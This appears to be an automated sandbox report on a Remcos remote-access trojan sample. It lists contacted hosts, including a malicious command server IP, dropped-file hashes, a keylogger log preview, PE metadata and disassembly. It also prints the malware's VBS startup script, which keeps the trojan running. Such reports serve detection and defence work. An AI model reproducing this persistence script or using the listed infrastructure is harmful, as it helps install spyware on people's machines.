http://geoplugin.net/json.gpSystem32 | antholite.exe, 00000002.00000002.4550520256.0000000001177000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com | antholite.exe, 00000002.00000002.4551500867.0000000004DC0000.00000040.10000000.00040000.00000000.sdmp, antholite.exe, 00000005.00000002.2146630051.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.google.com | antholite.exe, 00000002.00000002.4551500867.0000000004DC0000.00000040.10000000.00040000.00000000.sdmp, antholite.exe, 00000005.00000002.2146630051.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://fp-afd.azurefd.us/apc/trans.gif?94fb5ac9609bcb4cda0bf8acf1827073 | bhvA838.tmp.3.dr | false | Avira URL Cloud: safe | unknown
https://ecs.nel.measure.office.net?TenantId=Skype&DestinationEndpoint=Edge-Prod-LAX31r5a&FrontEnd=AF | bhvA838.tmp.3.dr | false | Avira URL Cloud: safe | unknown
https://aefd.nelreports.net/api/report?cat=bingaot | bhvA838.tmp.3.dr | false | URL Reputation: safe | unknown
http://geoplugin.net/json.gp/C | antholite.exe, 00000002.00000002.4549770141.0000000000400000.00000040.00001000.00020000.00000000.sdmp, antholite.exe, 00000002.00000002.4551036697.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, antholite.exe, 00000007.00000002.2233641554.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, antholite.exe, 00000007.00000002.2232850434.0000000000400000.00000040.00001000.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://geoplugin.net/json.gpK | antholite.exe, 00000002.00000002.4550896942.00000000012A7000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://maps.windows.com/windows-app-web-link | bhvA838.tmp.3.dr | false | Avira URL Cloud: safe | unknown
http://geoplugin.net/json.gpM | antholite.exe, 00000002.00000003.2142233343.00000000011C7000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://aefd.nelreports.net/api/report?cat=bingrms | bhvA838.tmp.3.dr | false | URL Reputation: safe | unknown
https://www.google.com/accounts/servicelogin | antholite.exe | false | Avira URL Cloud: safe | unknown
https://login.yahoo.com/config/login | antholite.exe | false | URL Reputation: safe | unknown
http://www.nirsoft.net/ | antholite.exe, 00000005.00000002.2146630051.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.imvu.comata | antholite.exe, 00000005.00000002.2147465927.000000000116D000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.ebuddy.com | antholite.exe, 00000002.00000002.4551500867.0000000004DC0000.00000040.10000000.00040000.00000000.sdmp, antholite.exe, 00000005.00000002.2146630051.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
192.210.150.26 | unknown | United States | | 36352 | AS-COLOCROSSINGUS | true
178.237.33.50 | geoplugin.net | Netherlands | | 8455 | ATOM86-ASATOM86NL | false
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1503444
Start date and time: 2024-09-03 15:23:08 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 42s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 10
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Rgh99876k7e.exe
Detection: MAL
Classification: mal100.rans.phis.troj.spyw.expl.evad.winEXE@12/14@1/2
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 54
• Number of non-executed functions: 300
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• VT rate limit hit for: Rgh99876k7e.exe
Time | Type | Description
09:24:38 | API Interceptor | 7041229x Sleep call for process: antholite.exe modified
15:24:07 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\antholite.vbs
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    192.210.150.26SALKI098765R400.exeGet hashmaliciousRemcosBrowse
                      FTE98767800000.bat.exeGet hashmaliciousRemcosBrowse
                        178.237.33.50SecuriteInfo.com.Exploit.CVE-2017-11882.123.18888.15372.rtfGet hashmaliciousRemcosBrowse
                        • geoplugin.net/json.gp
                        Quote.exeGet hashmaliciousRemcosBrowse
                        • geoplugin.net/json.gp
                        NtOl.exeGet hashmaliciousRemcosBrowse
                        • geoplugin.net/json.gp
                        Rfq_last_quater_product_purchase_order_import_list_2024_000000.cmdGet hashmaliciousGuLoader, RemcosBrowse
                        • geoplugin.net/json.gp
                        SecuriteInfo.com.Win32.PWSX-gen.3135.16188.exeGet hashmaliciousRemcosBrowse
                        • geoplugin.net/json.gp
                        2024082801362910.exeGet hashmaliciousRemcosBrowse
                        • geoplugin.net/json.gp
                        SecuriteInfo.com.BackDoor.AgentTeslaNET.34.20311.495.exeGet hashmaliciousRemcosBrowse
                        • geoplugin.net/json.gp
                        Document#.exeGet hashmaliciousRemcosBrowse
                        • geoplugin.net/json.gp
                        Revised SOA-INV023010924.xla.xlsxGet hashmaliciousRemcosBrowse
                        • geoplugin.net/json.gp
                        87890090.exeGet hashmaliciousRemcosBrowse
                        • geoplugin.net/json.gp
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        geoplugin.netSecuriteInfo.com.Exploit.CVE-2017-11882.123.18888.15372.rtfGet hashmaliciousRemcosBrowse
                        • 178.237.33.50
                        Quote.exeGet hashmaliciousRemcosBrowse
                        • 178.237.33.50
                        NtOl.exeGet hashmaliciousRemcosBrowse
                        • 178.237.33.50
                        Rfq_last_quater_product_purchase_order_import_list_2024_000000.cmdGet hashmaliciousGuLoader, RemcosBrowse
                        • 178.237.33.50
                        SecuriteInfo.com.Win32.PWSX-gen.3135.16188.exeGet hashmaliciousRemcosBrowse
                        • 178.237.33.50
                        2024082801362910.exeGet hashmaliciousRemcosBrowse
                        • 178.237.33.50
                        SecuriteInfo.com.BackDoor.AgentTeslaNET.34.20311.495.exeGet hashmaliciousRemcosBrowse
                        • 178.237.33.50
                        Document#.exeGet hashmaliciousRemcosBrowse
                        • 178.237.33.50
                        Revised SOA-INV023010924.xla.xlsxGet hashmaliciousRemcosBrowse
                        • 178.237.33.50
                        87890090.exeGet hashmaliciousRemcosBrowse
                        • 178.237.33.50
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
AS-COLOCROSSINGUS | SecuriteInfo.com.Exploit.CVE-2017-11882.123.18888.15372.rtf | Get hash | malicious | Remcos | Browse | 192.3.140.102
AS-COLOCROSSINGUS | Quote.exe | Get hash | malicious | Remcos | Browse | 192.3.64.152
AS-COLOCROSSINGUS | SecuriteInfo.com.Win32.PWSX-gen.3135.16188.exe | Get hash | malicious | Remcos | Browse | 192.3.64.152
AS-COLOCROSSINGUS | 1Td9Py5FAy.xls | Get hash | malicious | Unknown | Browse | 172.245.135.155
AS-COLOCROSSINGUS | 1Td9Py5FAy.xls | Get hash | malicious | Unknown | Browse | 172.245.135.155
AS-COLOCROSSINGUS | Thermo Fisher RFQ_TFS-1705.xls | Get hash | malicious | GuLoader | Browse | 192.3.243.166
AS-COLOCROSSINGUS | SecuriteInfo.com.Exploit.CVE-2017-11882.123.30284.2728.rtf | Get hash | malicious | Unknown | Browse | 23.95.235.112
AS-COLOCROSSINGUS | Revised SOA-INV023010924.xla.xlsx | Get hash | malicious | Remcos | Browse | 23.95.235.112
AS-COLOCROSSINGUS | Thermo Fisher RFQ_TFS-1705.xls | Get hash | malicious | GuLoader | Browse | 107.172.31.21
AS-COLOCROSSINGUS | MACHINE_SPECIFICATION.js | Get hash | malicious | WSHRat | Browse | 192.210.215.11
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
ATOM86-ASATOM86NL | SecuriteInfo.com.Exploit.CVE-2017-11882.123.18888.15372.rtf | Get hash | malicious | Remcos | Browse | 178.237.33.50
ATOM86-ASATOM86NL | Quote.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
ATOM86-ASATOM86NL | NtOl.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
ATOM86-ASATOM86NL | Rfq_last_quater_product_purchase_order_import_list_2024_000000.cmd | Get hash | malicious | GuLoader, Remcos | Browse | 178.237.33.50
ATOM86-ASATOM86NL | SecuriteInfo.com.Win32.PWSX-gen.3135.16188.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
ATOM86-ASATOM86NL | 2024082801362910.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
ATOM86-ASATOM86NL | SecuriteInfo.com.BackDoor.AgentTeslaNET.34.20311.495.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
ATOM86-ASATOM86NL | Document#.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
ATOM86-ASATOM86NL | Revised SOA-INV023010924.xla.xlsx | Get hash | malicious | Remcos | Browse | 178.237.33.50
ATOM86-ASATOM86NL | 87890090.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
                        Process:C:\Users\user\AppData\Local\Cocles\antholite.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):204
                        Entropy (8bit):3.3396429408575727
                        Encrypted:false
                        SSDEEP:3:rhlKlTlWHlQf4fU5JWRal2Jl+7R0DAlBG45klovDl64oojklovDl6v:6l4F9fU5YcIeeDAlOWA41gWAv
                        MD5:2853297D1D8D55FCA299F16A3EB43DC9
                        SHA1:A930B4A1865F11F33C2AD56D6A19AEDA05729C3C
                        SHA-256:5E120E9F98B5C5E179465C22F74DDAF1AF6EE9F04AD04C0A4A897B7133CE8DAC
                        SHA-512:0F91C574D1B649162C07EDD5A3E1E751651A755C31B495381F0824AE61F0AA9842DDD97D043B1E2C01E249C39783243EDA3138DCFCA263B83B20FC9EE280C28D
                        Malicious:true
                        Yara Hits:
                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                        Reputation:low
                        Preview:....[.2.0.2.4./.0.9./.0.3. .0.9.:.2.4.:.0.5. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].........[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
                        Process:C:\Users\user\Desktop\Rgh99876k7e.exe
                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                        Category:dropped
                        Size (bytes):1521152
                        Entropy (8bit):7.202131903261275
                        Encrypted:false
                        SSDEEP:24576:zqDEvCTbMWu7rQYlBQcBiT6rprG8auS2rwF3q65FE8wvsO5BaH3:zTvC/MTQYxsWR7auSY65G8wDKH
                        MD5:BD6420AAF066A5B4533598417866BC67
                        SHA1:CF56376DA61F4F34034FA4CC525E708052A5ECD3
                        SHA-256:B8022E8002A8E01A6364FDCC6D53275B6EDF3D196E36F0B4C9645DE2570CFD48
                        SHA-512:D9B394FC25949D552B64061810CD4452D24EE473C5755BADA25B1DB5AD35652A57B545C53C5E1DEA88FEAC376B86E838A6B87886E9AD50E1F582EB2B985CDA78
                        Malicious:true
                        Antivirus:
                        • Antivirus: Joe Sandbox ML, Detection: 100%
                        • Antivirus: ReversingLabs, Detection: 63%
                        Reputation:low
                        Process:C:\Users\user\AppData\Local\Cocles\antholite.exe
                        File Type:JSON data
                        Category:dropped
                        Size (bytes):962
                        Entropy (8bit):5.013811273052389
                        Encrypted:false
                        SSDEEP:12:tklu+mnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkk:qlu+KdRNuKyGX85jvXhNlT3/7AcV9Wro
                        MD5:18BC6D34FABB00C1E30D98E8DAEC814A
                        SHA1:D21EF72B8421AA7D1F8E8B1DB1323AA93B884C54
                        SHA-256:862D5523F77D193121112B15A36F602C4439791D03E24D97EF25F3A6CBE37ED0
                        SHA-512:8DF14178B08AD2EDE670572394244B5224C8B070199A4BD851245B88D4EE3D7324FC7864D180DE85221ADFBBCAACB9EE9D2A77B5931D4E878E27334BF8589D71
                        Malicious:false
                        Reputation:moderate, very likely benign file
                        Preview:{. "geoplugin_request":"8.46.123.33",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                        Process:C:\Users\user\Desktop\Rgh99876k7e.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):414916
                        Entropy (8bit):7.979098873996253
                        Encrypted:false
                        SSDEEP:6144:wgt0O4hqphCflSeYkcDbxhM4B5845Txw+cW6hYBRc7zKBkay/KUjUp/dqyU6vDnd:wgAcph8WngWd5qWJBRc6BkLneFqyU6Dd
                        MD5:11AAE4FD5C5DD736D1DED6E1080BE299
                        SHA1:5D4480C33FBBA3169B933E40E5A2DEC8D6FA9438
                        SHA-256:C1F96C9087AAB6F63C94915D6FF46C4DA0220D5F48AD89F7374DC1FDA192ADC2
                        SHA-512:73390FC932054043695B572D12DA490B0A1B2DA9ABE465062897CA25F5BFB885886566D02F8DD54CFAA6D7032A4845C7B5243A2DAC07A3371459C5F7DCE76D92
                        Malicious:false
                        Reputation:low
                        Process:C:\Users\user\Desktop\Rgh99876k7e.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):14434
                        Entropy (8bit):7.624681287857388
                        Encrypted:false
                        SSDEEP:192:In0yQDCKlUhJPHew2jEiNc1ft4mhbQk05Qo6Y5Z6E2DiEO1FftpCn64su+1gpa6L:aKlU9uLNcsAv05yAgE/VpNNPmp/gD4sq
                        MD5:345ED665A9EBB49BA899D0A62F389EA0
                        SHA1:68698DBAAAE4983C38DA2B14FBB1FEC060D9D2E8
                        SHA-256:294B6354F17D6D3DFEEB71C5C43FDE0A3A52551B826614742D4DD4EB32FF6A37
                        SHA-512:37AF32BCE9DF05FED6190F44AF5EB6C62F74F4D47EF44F9D893A9BEFCA1FBCD378CF1AD5242ABF5F9AA0701B5F4133539A415EABD094D240EAB3430179CB9A39
                        Malicious:false
                        Reputation:low
                        Process:C:\Users\user\AppData\Local\Cocles\antholite.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):414916
                        Entropy (8bit):7.979098873996253
                        Encrypted:false
                        SSDEEP:6144:wgt0O4hqphCflSeYkcDbxhM4B5845Txw+cW6hYBRc7zKBkay/KUjUp/dqyU6vDnd:wgAcph8WngWd5qWJBRc6BkLneFqyU6Dd
                        MD5:11AAE4FD5C5DD736D1DED6E1080BE299
                        SHA1:5D4480C33FBBA3169B933E40E5A2DEC8D6FA9438
                        SHA-256:C1F96C9087AAB6F63C94915D6FF46C4DA0220D5F48AD89F7374DC1FDA192ADC2
                        SHA-512:73390FC932054043695B572D12DA490B0A1B2DA9ABE465062897CA25F5BFB885886566D02F8DD54CFAA6D7032A4845C7B5243A2DAC07A3371459C5F7DCE76D92
                        Malicious:false
                        Reputation:low
                        Process:C:\Users\user\AppData\Local\Cocles\antholite.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):14434
                        Entropy (8bit):7.624681287857388
                        Encrypted:false
                        SSDEEP:192:In0yQDCKlUhJPHew2jEiNc1ft4mhbQk05Qo6Y5Z6E2DiEO1FftpCn64su+1gpa6L:aKlU9uLNcsAv05yAgE/VpNNPmp/gD4sq
                        MD5:345ED665A9EBB49BA899D0A62F389EA0
                        SHA1:68698DBAAAE4983C38DA2B14FBB1FEC060D9D2E8
                        SHA-256:294B6354F17D6D3DFEEB71C5C43FDE0A3A52551B826614742D4DD4EB32FF6A37
                        SHA-512:37AF32BCE9DF05FED6190F44AF5EB6C62F74F4D47EF44F9D893A9BEFCA1FBCD378CF1AD5242ABF5F9AA0701B5F4133539A415EABD094D240EAB3430179CB9A39
                        Malicious:false
                        Reputation:low
                        Process:C:\Users\user\AppData\Local\Cocles\antholite.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):414916
                        Entropy (8bit):7.979098873996253
                        Encrypted:false
                        SSDEEP:6144:wgt0O4hqphCflSeYkcDbxhM4B5845Txw+cW6hYBRc7zKBkay/KUjUp/dqyU6vDnd:wgAcph8WngWd5qWJBRc6BkLneFqyU6Dd
                        MD5:11AAE4FD5C5DD736D1DED6E1080BE299
                        SHA1:5D4480C33FBBA3169B933E40E5A2DEC8D6FA9438
                        SHA-256:C1F96C9087AAB6F63C94915D6FF46C4DA0220D5F48AD89F7374DC1FDA192ADC2
                        SHA-512:73390FC932054043695B572D12DA490B0A1B2DA9ABE465062897CA25F5BFB885886566D02F8DD54CFAA6D7032A4845C7B5243A2DAC07A3371459C5F7DCE76D92
                        Malicious:false
                        Reputation:low
                        Process:C:\Users\user\AppData\Local\Cocles\antholite.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):14434
                        Entropy (8bit):7.624681287857388
                        Encrypted:false
                        SSDEEP:192:In0yQDCKlUhJPHew2jEiNc1ft4mhbQk05Qo6Y5Z6E2DiEO1FftpCn64su+1gpa6L:aKlU9uLNcsAv05yAgE/VpNNPmp/gD4sq
                        MD5:345ED665A9EBB49BA899D0A62F389EA0
                        SHA1:68698DBAAAE4983C38DA2B14FBB1FEC060D9D2E8
                        SHA-256:294B6354F17D6D3DFEEB71C5C43FDE0A3A52551B826614742D4DD4EB32FF6A37
                        SHA-512:37AF32BCE9DF05FED6190F44AF5EB6C62F74F4D47EF44F9D893A9BEFCA1FBCD378CF1AD5242ABF5F9AA0701B5F4133539A415EABD094D240EAB3430179CB9A39
                        Malicious:false
                        Reputation:low
                        Process:C:\Users\user\AppData\Local\Cocles\antholite.exe
                        File Type:Extensible storage engine DataBase, version 0x620, checksum 0xd4e7e28d, page size 32768, DirtyShutdown, Windows version 10.0
                        Category:dropped
                        Size (bytes):17301504
                        Entropy (8bit):0.8011978059208145
                        Encrypted:false
                        SSDEEP:6144:KdfjZb5aXEY2waXEY24URlMe4APXAP5APzAPwbndOO8pHAP6JnTJnTbnSotnBQ+z:IVS4e81ySaKKjLrONseWe
                        MD5:73B5AA07553E8B6752420B897E157D4E
                        SHA1:AD3BF0BB369D2A2A490A5F96F4BA209E6E7DAED1
                        SHA-256:730406BB98B67517A67D0EAFFA31D8CE7AF904DDB39CF30CB37CECF99CEDA374
                        SHA-512:1E891798D6C40AC3F168844B3B18D346656ADFDCF12E7015E112C2F2E0FCC1D609E320BA105130297A785E169A6D806B621FEC222C38F7AC20442FD5CB0A4EFE
                        Malicious:false
                        Process:C:\Users\user\AppData\Local\Cocles\antholite.exe
                        File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                        Category:dropped
                        Size (bytes):2
                        Entropy (8bit):1.0
                        Encrypted:false
                        SSDEEP:3:Qn:Qn
                        MD5:F3B25701FE362EC84616A93A45CE9998
                        SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                        SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                        SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                        Malicious:false
                        Preview:..
                        Process:C:\Users\user\Desktop\Rgh99876k7e.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):494080
                        Entropy (8bit):7.567840487271941
                        Encrypted:false
                        SSDEEP:12288:bX/ShhJIs5jxaSY6ToQFEtlyKRTzO5V9OB2psRMMJ17nP8wI:bAJIs59a2oaaDRTzO5b8VDb8wI
                        MD5:48005136BC147209AC8F408339C017E9
                        SHA1:2758101D2F96164A3E0CB62785223888946F53FA
                        SHA-256:76E8C3C933C18BAE6BB3CFBFA2ACEB9DB31C7862A56775DE9CED8F1EC3A72F7F
                        SHA-512:E0AC69DE23C7354F61D634BA4064D63F54F75306DD06A15884D8C2DA75908643DB405FA430A84DBEB1AF5E66C153C4D26E1006916F6879BA5BD9D8F9B459EAAC
                        Malicious:false
                        Process:C:\Users\user\Desktop\Rgh99876k7e.exe
                        File Type:ASCII text, with very long lines (65536), with no line terminators
                        Category:dropped
                        Size (bytes):143370
                        Entropy (8bit):2.663212297966778
                        Encrypted:false
                        SSDEEP:384:qrYq11YnBr4syynyQndWYColVesmlzXYxb3WUgQRm0LYQ:n
                        MD5:FC0250799241323E9F3A53F51F7DF0F1
                        SHA1:F0D60DBF33047494014302B4EE8B438CC0380943
                        SHA-256:0469EC50B7420320B46FB0A05C5D875DE1CA110B2E18FBCB37860E2A6CD31982
                        SHA-512:CCACACED5EB79A9920299599B34984788C2288BF07CE1A423668C5B4E56F4348CF7A6A29231A658FCE07A40719897EE1DDE428D4539A8007F6028B243F718661
                        Malicious:false
                        Process:C:\Users\user\AppData\Local\Cocles\antholite.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):274
                        Entropy (8bit):3.3744078175813597
                        Encrypted:false
                        SSDEEP:6:DMM8lfm3OOQdUfclo5ZsUEZ+lX1mlKUHsyBnriIM8lfQVn:DsO+vNlzQ1wsCmA2n
                        MD5:D5D40F3ED3E849D3A12AF5579AA1147A
                        SHA1:E7818A25ADFDE6C86A23113B34889C9EA6F1BF0A
                        SHA-256:C1130B8288DEDF948D98566CAEB4E900EEB4EAF6D48330FC9E475FCA0C5E1F6E
                        SHA-512:95D851D52B4581DC1A498D3FB657E4AD88DF2E8F208E2DAA243FB9BD26EECE837FCEDDBDAAE217EF39F48F182793CBA09A8633E44E92CAAEC3DA15DA4015552B
                        Malicious:true
                        Preview:S.e.t. .W.s.h.S.h.e.l.l. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...W.s.h.S.h.e.l.l...R.u.n. .".C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.C.o.c.l.e.s.\.a.n.t.h.o.l.i.t.e...e.x.e.".,. .1...S.e.t. .W.s.h.S.h.e.l.l. .=. .N.o.t.h.i.n.g...
                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                        Entropy (8bit):7.202131903261275
                        TrID:
                        • Win32 Executable (generic) a (10002005/4) 99.96%
                        • Generic Win/DOS Executable (2004/3) 0.02%
                        • DOS Executable Generic (2002/1) 0.02%
                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                        File name:Rgh99876k7e.exe
                        File size:1'521'152 bytes
                        MD5:bd6420aaf066a5b4533598417866bc67
                        SHA1:cf56376da61f4f34034fa4cc525e708052a5ecd3
                        SHA256:b8022e8002a8e01a6364fdcc6d53275b6edf3d196e36f0b4c9645de2570cfd48
                        SHA512:d9b394fc25949d552b64061810cd4452d24ee473c5755bada25b1db5ad35652a57b545c53c5e1dea88feac376b86e838a6b87886e9ad50e1f582eb2b985cda78
                        SSDEEP:24576:zqDEvCTbMWu7rQYlBQcBiT6rprG8auS2rwF3q65FE8wvsO5BaH3:zTvC/MTQYxsWR7auSY65G8wDKH
                        TLSH:7065BF5133A5C353FEA699720F8AE6306AF8756D44D3660F12F80B7DB7F02A0056D6E2
                        File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....
                        Icon Hash:6194944323030383
                        Entrypoint:0x420577
                        Entrypoint Section:.text
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                        DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                        Time Stamp:0x66D54032 [Mon Sep 2 04:33:54 2024 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:5
                        OS Version Minor:1
                        File Version Major:5
                        File Version Minor:1
                        Subsystem Version Major:5
                        Subsystem Version Minor:1
                        Import Hash:948cc502fe9226992dce9417f952fce3
                        Instruction
                        call 00007F0E049CA6B3h
                        jmp 00007F0E049C9FBFh
                        push ebp
                        mov ebp, esp
                        push esi
                        push dword ptr [ebp+08h]
                        mov esi, ecx
                        call 00007F0E049CA19Dh
                        mov dword ptr [esi], 0049FDF0h
                        mov eax, esi
                        pop esi
                        pop ebp
                        retn 0004h
                        and dword ptr [ecx+04h], 00000000h
                        mov eax, ecx
                        and dword ptr [ecx+08h], 00000000h
                        mov dword ptr [ecx+04h], 0049FDF8h
                        mov dword ptr [ecx], 0049FDF0h
                        ret
                        push ebp
                        mov ebp, esp
                        push esi
                        push dword ptr [ebp+08h]
                        mov esi, ecx
                        call 00007F0E049CA16Ah
                        mov dword ptr [esi], 0049FE0Ch
                        mov eax, esi
                        pop esi
                        pop ebp
                        retn 0004h
                        and dword ptr [ecx+04h], 00000000h
                        mov eax, ecx
                        and dword ptr [ecx+08h], 00000000h
                        mov dword ptr [ecx+04h], 0049FE14h
                        mov dword ptr [ecx], 0049FE0Ch
                        ret
                        push ebp
                        mov ebp, esp
                        push esi
                        mov esi, ecx
                        lea eax, dword ptr [esi+04h]
                        mov dword ptr [esi], 0049FDD0h
                        and dword ptr [eax], 00000000h
                        and dword ptr [eax+04h], 00000000h
                        push eax
                        mov eax, dword ptr [ebp+08h]
                        add eax, 04h
                        push eax
                        call 00007F0E049CCD5Dh
                        pop ecx
                        pop ecx
                        mov eax, esi
                        pop esi
                        pop ebp
                        retn 0004h
                        lea eax, dword ptr [ecx+04h]
                        mov dword ptr [ecx], 0049FDD0h
                        push eax
                        call 00007F0E049CCDA8h
                        pop ecx
                        ret
                        push ebp
                        mov ebp, esp
                        push esi
                        mov esi, ecx
                        lea eax, dword ptr [esi+04h]
                        mov dword ptr [esi], 0049FDD0h
                        push eax
                        call 00007F0E049CCD91h
                        test byte ptr [ebp+08h], 00000001h
                        pop ecx
                        Programming Language:
                        • [ C ] VS2008 SP1 build 30729
                        • [IMP] VS2008 SP1 build 30729
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xc8e64 | 0x17c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xd4000 | 0x9ca3c | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x171000 | 0x7594 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xb0ff0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0xc3400 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xb1010 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x9c000 | 0x894 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x9ab1d | 0x9ac00 | 0a1473f3064dcbc32ef93c5c8a90f3a6 | False | 0.565500681542811 | data | 6.668273581389308 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
